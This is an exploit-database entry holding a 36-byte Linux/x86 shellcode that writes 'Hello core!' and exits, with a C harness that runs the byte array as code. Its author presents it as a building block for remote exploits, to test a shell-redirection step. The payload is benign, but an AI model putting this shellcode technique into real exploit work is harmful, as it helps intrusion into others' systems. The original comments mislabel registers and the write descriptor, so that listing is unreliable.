ID 1337DAY-ID-7129 Type zdt Reporter Charles Stevenson Modified 2005-11-09T00:00:00
Description
Exploit for linux/x86 platform in category shellcode
========================================================================
linux/x86 write(0,"Hello core!\n",12); (w/optional 7 byte exit) 36 bytes
========================================================================
/* writehello-core.c by Charles Stevenson <[email protected]>
*
* I made this as a chunk you can paste in to make modular remote
* exploits. I use it to see if my dup2_loop worked. If you don't
* get "Hello core!\n" back it's a good indicator your shell won't
* be functional the way you'd like.
*/
/*
 * 36-byte code sequence for 32-bit x86 Linux (int $0x80 system-call
 * interface). It builds the 12-byte string "Hello core!\n" on the stack,
 * issues one write() of it, and then runs an optional 7-byte _exit(1) tail.
 * Registers at each int $0x80: eax = call number, ebx/ecx/edx = arguments.
 *
 * None of the 36 bytes is 0x00, which is why strlen() in main() reports the
 * full length of the array contents.
 *
 * NOTE(review): the first three mnemonics in the original listing named
 * %ecx, but the opcodes 31 db / f7 e3 / 53 operate on %ebx; the annotations
 * below follow the bytes. As encoded, %ebx is 1 when write is invoked, so
 * the descriptor argument is 1, not 0 as the title text states.
 */
char hellcode[] = /* write(0,"Hello core!\n",12); linux/x86 by core */
"\x31\xdb" // xor %ebx,%ebx      ebx = 0
"\xf7\xe3" // mul %ebx           edx:eax = eax * 0, so eax = 0 and edx = 0
"\x53" // push %ebx              four zero bytes placed above the string
"\x68\x72\x65\x21\x0a" // push $0xa216572    bytes "re!\n"
"\x68\x6f\x20\x63\x6f" // push $0x6f63206f   bytes "o co"
"\x68\x48\x65\x6c\x6c" // push $0x6c6c6548   bytes "Hell"; esp now points at the string
"\xb2\x0c" // mov $0xc,%dl       edx = 12, the byte count
"\x43" // inc %ebx               ebx = 1, the file descriptor argument
"\x89\xe1" // mov %esp,%ecx      ecx = address of the string on the stack
"\xb0\x04" // mov $0x4,%al       eax = 4, the write system call
"\xcd\x80" // int $0x80          enter the kernel
// Optional tail: not required for the write itself, it only makes the
// process terminate cleanly afterwards. 7 bytes, _exit(1).
"\x31\xc0" // xor %eax,%eax      eax = 0
"\x40" // inc %eax               eax = 1, the exit system call
"\x89\xc3" // mov %eax,%ebx      ebx = 1, the exit status
"\xcd\x80" // int $0x80          enter the kernel; does not return
;
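/*
 * Test harness: prints the length of hellcode and then calls into the array
 * as if it were a function.
 *
 * The bytes are 32-bit x86 Linux code, so the harness is only meaningful when
 * built as a 32-bit x86 Linux program. hellcode is an ordinary writable data
 * array; where data pages are mapped non-executable, the call faults instead
 * of running the bytes. When the bytes do run, the _exit(1) tail ends the
 * process, so the final return is not reached.
 *
 * NOTE(review): the listing as shown carries no #include lines; printf and
 * strlen need <stdio.h> and <string.h> to be declared.
 */
int main(void)
{
    /* Object-to-function pointer conversion: a common compiler extension,
     * not guaranteed by ISO C. */
    void (*shell)(void) = (void *)&hellcode;

    /* strlen returns size_t, so the conversion must be %zu; the original %d
     * mismatched the argument type. The count is complete only because the
     * sequence contains no 0x00 byte. */
    printf("%zu byte (w/optional 7 byte exit) write(0,\"Hello core!\\n\",12); linux/x86 by core\n",
           strlen(hellcode));

    shell();
    return 0;
}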
{"published": "2005-11-09T00:00:00", "id": "1337DAY-ID-7129", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for linux/x86 platform in category shellcode", "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2018-01-06T07:04:21", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["SUSE_SU-2016-2328-1.NASL", "APPLETV_11.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:7129", "SECURITYVULNS:VULN:4147"]}], "modified": "2018-01-06T07:04:21", "rev": 2}, "vulnersScore": 1.1}, "type": "zdt", "lastseen": "2018-01-06T07:04:21", "edition": 2, "title": "linux/x86 write(0,\"Hello core!\n\",12); (w/optional 7 byte exit) 36 bytes", "href": "https://0day.today/exploit/description/7129", "modified": "2005-11-09T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/7129", "references": [], "reporter": "Charles Stevenson", "sourceData": "========================================================================\r\nlinux/x86 write(0,\"Hello core!\\n\",12); (w/optional 7 byte exit) 36 bytes\r\n========================================================================\r\n\r\n\r\n\r\n\r\n\r\n\r\n/* writehello-core.c by Charles Stevenson <[email\u00a0protected]> \r\n *\r\n * I made this as a chunk you can paste in to make modular remote\r\n * exploits. I use it to see if my dup2_loop worked. 
If you don't\r\n * get \"Hello core!\\n\" back it's a good indicator your shell won't\r\n * be functional the way you'd like.\r\n */\r\nchar hellcode[] = /* write(0,\"Hello core!\\n\",12); linux/x86 by core */\r\n\"\\x31\\xdb\" // xor %ecx,%ecx\r\n\"\\xf7\\xe3\" // mul %ecx\r\n\"\\x53\" // push %ecx\r\n\"\\x68\\x72\\x65\\x21\\x0a\" // push $0xa216572\r\n\"\\x68\\x6f\\x20\\x63\\x6f\" // push $0x6f63206f\r\n\"\\x68\\x48\\x65\\x6c\\x6c\" // push $0x6c6c6548\r\n\"\\xb2\\x0c\" // mov $0xc,%dl\r\n\"\\x43\" // inc %ebx\r\n\"\\x89\\xe1\" // mov %esp,%ecx\r\n\"\\xb0\\x04\" // mov $0x4,%al\r\n\"\\xcd\\x80\" // int $0x80\r\n// not needed.. makes it exit cleanly\r\n// 7 bytes _exit(1) ... 'cause we're nice >:) by core\r\n\"\\x31\\xc0\" // xor %eax,%eax\r\n\"\\x40\" // inc %eax\r\n\"\\x89\\xc3\" // mov %eax,%ebx\r\n\"\\xcd\\x80\" // int $0x80\r\n;\r\n\r\nint main(void)\r\n{\r\n void (*shell)() = (void *)&hellcode;\r\n printf(\"%d byte (w/optional 7 byte exit) write(0,\\\"Hello core!\\\\n\\\",12); linux/x86 by core\\n\",\r\n strlen(hellcode));\r\n shell();\r\n return 0;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-06] #"}